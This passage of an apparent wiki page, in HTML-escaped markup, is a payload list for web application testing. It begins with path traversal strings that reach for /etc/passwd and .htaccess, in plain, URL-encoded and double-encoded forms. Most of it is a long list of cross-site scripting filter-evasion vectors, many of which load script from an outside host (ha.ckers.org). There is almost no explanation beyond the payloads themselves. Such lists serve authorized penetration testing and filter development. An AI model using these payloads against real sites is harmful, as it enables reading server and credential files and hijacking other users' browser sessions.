../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Full List ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, 'XSS'&amp;quot;)`&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav	ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
\&amp;quot;;alert('XSS');//&lt;br /&gt;
&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&lt;br /&gt;
&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;XSS&amp;quot;)'&amp;gt;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IFRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;
&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&lt;br /&gt;
&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;*//*&amp;quot;);xss:&amp;amp;#101;x&amp;amp;#x2F;*XSS*//*/*/pression(alert(&amp;quot;XSS&amp;quot;))'&amp;gt;&lt;br /&gt;
&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert('XSS')&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;lt;BASE HREF=&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot; type=&amp;quot;image/svg+xml&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;xss&amp;quot; implementation=&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;#xss&amp;quot; DATAFLD=&amp;quot;B&amp;quot; DATAFORMATAS=&amp;quot;HTML&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML SRC=&amp;quot;xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;t&amp;quot; ns=&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;t&amp;quot; implementation=&amp;quot;#default#time2&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;innerHTML&amp;quot; to=&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;--&amp;gt;&lt;br /&gt;
&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT =&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; '' SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT &amp;quot;a='&amp;gt;'&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;'&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;h\ntt\tp://6&amp;amp;#9;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
